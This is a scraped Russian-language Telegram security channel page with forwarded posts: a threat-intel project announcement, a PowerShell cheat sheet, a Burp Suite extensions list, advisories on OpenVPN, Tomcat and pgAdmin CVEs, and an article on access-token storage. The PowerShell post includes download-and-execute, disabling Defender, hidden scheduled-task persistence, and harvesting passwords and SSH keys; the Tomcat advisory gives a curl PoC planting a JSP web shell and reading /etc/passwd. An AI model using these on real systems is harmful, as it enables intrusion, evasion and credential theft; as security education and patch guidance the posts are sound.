Fsecurity | HH
2.06K subscribers
1.74K photos
105 videos
62 files
6.19K links
Канал про ИБ
Наш Discord: https://discord.gg/Eg8aDS7Hn7
Пожертвовать:
> https://www.donationalerts.com/r/xackapb
Download Telegram
Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
Forwarded from s0ld13r ch. (s0ld13r)
Threat Intelligence drop ragghhhh 🕺🕺

Рефлексируя тематику этого канала, решил запустить небольшой комьюнити проект для шейра индикаторов компрометации и угроз которые таргетят Центральную Азию (и не только) 💃

Думаю это логичное продолжение тематики TI на канале, чтобы где то можно было собрать все находки и передавать их комьюнити ❤️

В скором времени начну активно добавлять IoC с различных исследований, фидов и залью индикаторы которые смог найти в предыдущих постах 😎

Буду рад вкладу каждого в развитие TI платформы (на базе MISP) — можно присылать свои находки, ссылки на репорты, дампы, фиды и просто идеи. Даже маленький IoC может оказаться критически важным для других, все абсолютно бесплатно и на безвозмездной основе, если будет желание подключиться и помочь то мой лс всегда открыт 😸

Рад представить вам
threatintel.kz 👋

🧢 s0ld13r
Please open Telegram to view this post
VIEW IN TELEGRAM
1
Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
Forwarded from Whitehat Lab
🏃 Powershell Tips & Tricks

Для выполнения некоторых командлетов необходим импортированный AD модуль

🖥 ADModule

Подключаем:

Import-Module C:\Microsoft.ActiveDirectory.Management.dll -Verbose
iex (new-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1');Import-ActiveDirectory

или
Import-Module C:\Microsoft.ActiveDirectory.Management.dll -Verbose
Import-Module C:\ActiveDirectory\ActiveDirectory.psd1
Get-Command -Module ActiveDirectory


Информация о системе
:

Get-WmiObject -Class Win32_OperatingSystem | Select-Object -Property *


Список процессов:

Get-Process | Select-Object -Property ProcessName, Id, CPU | Sort-Object -Property CPU -Descending


FailureAudit в логах:

Get-EventLog -LogName Security | Where-Object {$_.EntryType -eq 'FailureAudit'}


Сканер портов:

1..1024 | ForEach-Object { $sock = New-Object System.Net.Sockets.TcpClient; $async = $sock.BeginConnect('localhost', $_, $null, $null); $wait = $async.AsyncWaitHandle.WaitOne(100, $false); if($sock.Connected) { $_ } ; $sock.Close() }


Выполнить команду на удаленном ПК:

Invoke-Command -ComputerName TargetPC -ScriptBlock { Get-Process } -Credential (Get-Credential)


Скачать и выполнить скрипт:

$url = 'http://example.com/script.ps1'; Invoke-Expression (New-Object Net.WebClient).DownloadString($url)


Execution policy bypass:

Set-ExecutionPolicy Bypass -Scope Process -Force; .\script.ps1


Список доменных юзеров:

# Нужен AD модуль
Get-ADUser -Filter * -Properties * | Select-Object -Property Name, Enabled, LastLogonDate


Список залогиненых юзеров:

Get-WMIObject -Class Win32_ComputerSystem -Computer "HOST01" | Select-Object Username


Давно не логинились, но УЗ включена:

# Нужен AD модуль
Get-ADuser -filter {enabled -eq "True"} -properties LastlogonDate | ? {$_.lastlogondate -le (get-date).adddays(-90)} | ft Name


Прибить процесс:

Get-Process -Name "Notepad" | Stop-Process -Force


Список установленного ПО:

Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, Publisher, InstallDate


Мониторинг изменений ФС
:

$watcher = New-Object System.IO.FileSystemWatcher; $watcher.Path = 'C:\'; $watcher.IncludeSubdirectories = $true; $watcher.EnableRaisingEvents = $true; Register-ObjectEvent $watcher 'Created' -Action { Write-Host 'File Created: ' $Event.SourceEventArgs.FullPath }


Отключаем Defender:

Set-MpPreference -SubmitSamplesConsent NeverSend
Set-MpPreference -MAPSReporting Disabled
Set-MpPreference -DisableRealtimeMonitoring $true


Задание в планировщик для закрепа:

$action = New-ScheduledTaskAction -Execute 'Powershell.exe' -Argument '-NoProfile -WindowStyle Hidden -Command "YourCommand"'; $trigger = New-ScheduledTaskTrigger -AtStartup; Register-ScheduledTask -Action $action -Trigger $trigger -TaskName 'MyTask' -Description 'MyDescription'


Поиск паролей в текстовых файлах:

Select-String -Path C:\Users\*\Documents\*.txt -Pattern 'password' -CaseSensitive


Собираем SSH ключи:

Get-ChildItem -Path C:\Users\*\.ssh\id_rsa -Recurse


Продолжение следует

#powershell #windows

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🤨 Искал медь, а нашёл золото

Наткнулся на настоящее сокровище для веб-пентестера — огромную подборку расширений для Burp Suite (Community и Pro) с их описанием на GitHub. Здесь есть всё, чтобы прокачать ваш инструмент до боевого монстра!

Внутри репозитория:
➡️Scanners — сканеры уязвимостей;
➡️Custom Features — уникальные доработки для Burp Suite;
➡️Beautifiers and Decoders — форматирование и декодирование данных;
➡️Cloud Security — тестирование облачных сервисов;
➡️Scripting — расширения для работы со скриптами и автоматизации тестирования;
➡️OAuth and SSO — инструменты для тестирования аутентификации;
➡️Information Gathering — сбор информации о целевой системе;
➡️Vulnerability Specific Extensions — инструменты под конкретные уязвимости;
➡️Web Application Firewall Evasion — обход систем веб-защиты;
➡️Logging and Notes — ведение логов и заметок во время тестов;
➡️Payload Generators and Fuzzers — генераторы полезных нагрузок и фаззеры;
➡️Cryptography — инструменты для работы с шифрами/хэшами;
➡️Tool Integration — расширения, связанные с интеграцией Burp Suite с другим программным обеспечением/инструментами;
➡️Misc — разные полезные расширения;
➡️Burp Extension Training Resources — обучающие материалы по работе с расширениями.

А какие добавленные расширения вам больше всего понравились?

🔗 Ссылка на подборку расширений Burp Suite

#github #материал
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from SecuriXy.kz
#️⃣ Критическая уязвимость в OpenVPN (TLS-crypt-v2) CVE-2025-2704

🧨 Удалённая DoS-атака на OpenVPN-сервер через повреждённые и переиспользованные пакеты в ранней фазе TLS-рукопожатия.

📌 Уязвимы версии:
2.6.1 - 2.6.13 (в режиме сервера с включённым `--tls-crypt-v2`)

⚠️ Атакующий с валидным TLS-ключом или доступом к трафику, может вызвать краш сервера с ASSERT()-ошибкой.

🔧 Рекомендации:
Обновитесь до последней версии
Временно отключите --tls-crypt-v2, если обновление невозможно

💬 👉 https://securityonline.info/cve-2025-2704-critical-bug-in-openvpn-can-trigger-server-crashes/
Forwarded from SecuriXy.kz
🔥 Path Equivalence в Apache Tomcat CVE-2025-24813
Критическая RCE-уязвимость из-за некорректной обработки ../ в PUT-запросах.

💥 Уязвимые версии:
Tomcat 11.0.0-M1 – 11.0.2
Tomcat 10.1.0-M1 – 10.1.34
Tomcat 9.0.0.M1 – 9.0.98
📌 Исправлено в: 11.0.3, 10.1.35, 9.0.99

🧨 Эксплуатация возможна при включённой записи через default servlet (по умолчанию выключено) и использовании partial PUT (включено по умолчанию).

📦 PoC:

curl -X PUT "http://target.com/uploads/../webapps/ROOT/updates.jsp" \
-H "Content-Type: application/x-jsp" \
--data-raw '<%@ page import="java.io.*" %>
<html><body>
<form method="GET"><input type="text" name="cmd"><input type="submit" value="Run"></form>
<% if(request.getParameter("cmd") != null) {
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
String l; while((l=r.readLine())!=null){ out.println(l+"<br>"); } } %>
</body></html>' -i


📥 Доступ к вебшеллу:

curl "http://target.com/updates.jsp?cmd=cat/etc/passwd" -i


📚 Подробнее: 👉 https://github.com/advisories/GHSA-83qj-6fr2-vhqg

‼️ EPSS: 93.5% — высокая вероятность эксплуатации в реальных атаках.

Обновляйте Tomcat или блокируйте PUT на уровне веб-сервера, если не используется.
Forwarded from SecuriXy.kz
💣 pgAdmin RCE CVE-2025-2945 -
Удалённое выполнение кода (RCE) в одном из самых популярных GUI-интерфейсов для PostgreSQL.

Актуально для всех версий pgAdmin ≤ 9.1

🧠 Уязвимость кроется в eval() - опасной функции, интерпретирующей строки как исполняемый код.

🎯 Уязвимые endpoints:

/sqleditor/query_tool/download/<int:trans_id>

/cloud/deploy

📌 Условия эксплуатации:
Нужна аутентификация
POST-запросы к указанным маршрутам

📉 Потенциал:
Полный захват сервера, выполнение произвольных команд, возможность lateral movement внутри инфраструктуры.

🔗 Подробнее: 👉 https://py0zz1.tistory.com/entry/Remote-Code-Execution-Vulnerability-in-pgAdmin-CVE-2025-2945

https://www.youtube.com/watch?v=V2WzCmRct7s
Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
Forwarded from AppSecs
Представим ситуацию, у нас реализуется web-приложение с stateless сессиями — с использованием accessToken. Пользователь проходит аутентификацию, и backend-сервер выпускает accessToken и передает его клиенту.
Классический вопрос: «Где хранить accessToken на клиенте?».

Если JS-коду не нужно взаимодействовать с токеном, то единственным безопасным вариантом является хранение токена в Cookie с атрибутами HttpOnly, SameSite, Secure. Однако, как быть, если такая необходимость есть? Хранить токен в localStorage?

😏Чем плохо такое решение? Если хранить accessToken в localStorage, то при XSS у злоумышленника будет доступ к хранилищу браузера, и токен может быть украден.

На практике мне встречалась реализация, где разработчики и рыбку съели и токен хранили в Cookie, и подставляли его в HTTP Header через JS.
Как? Всё просто — они реализовали API, который возвращает в теле ответа все Cookie, которые передавались в HTTP запросе. JS-код брал токен из ответа и подставлял в HTTP заголовок Bearer для следующего запроса. По сути это обход защиты атрибута HttpOnly.

😏Чем плох этот вариант? Помимо XSS, при небезопасной конфигурации CORS, злоумышленник сможет получить токен жертвы из ответа сервера, заманив ее на подконтрольный ресурс.

Существует еще одно решение — хранить токен в переменной JS и обернуть его в замыкание. Однако у злоумышленника останется возможность влиять на контекст выполнения. Поэтому, более безопасный метод - предотвратить вмешательство с помощью XSS в среду выполнения, которая имеет токен, достигая изоляции контекста. В веб-фронтенде это можно сделать с помощью Web Workers.

Web Workers это механизм, который позволяет скрипту выполняться в фоновом потоке, который отделен от основного потока веб-приложения.


Идея заключается в том, чтобы поместить все запросы API в рабочий поток. Благодаря изоляции среды выполнения, если в рабочем потоке нет XSS, основной поток не может вмешаться в рабочего и не может получить доступ к его данным. Это обеспечивает безопасность токена.

Web Worker делится на три вида:
Dedicated workers: используется только одним скриптом
Shared workers: может использоваться несколькими скриптами в разных окнах/фреймах.
Service Workers: выполняет роль прокси-сервера для взаимодействия между веб-приложением, браузером и сетью.

🔍 В этой статье описывается пример использование Dedicated Worker и обоснование отказа от Service Worker.

🔍 В этой статье, напротив, используется Service Worker + описываются другие примеры использования «прослойки» между фронтом и беком. Например, в кейсе, который я описывал выше (с API, которая возвращает Cookie в ответе), можно было бы использовать прокси на бэке, отказавшись вовсе от работы JS-кода с токеном в браузере пользователя.
Please open Telegram to view this post
VIEW IN TELEGRAM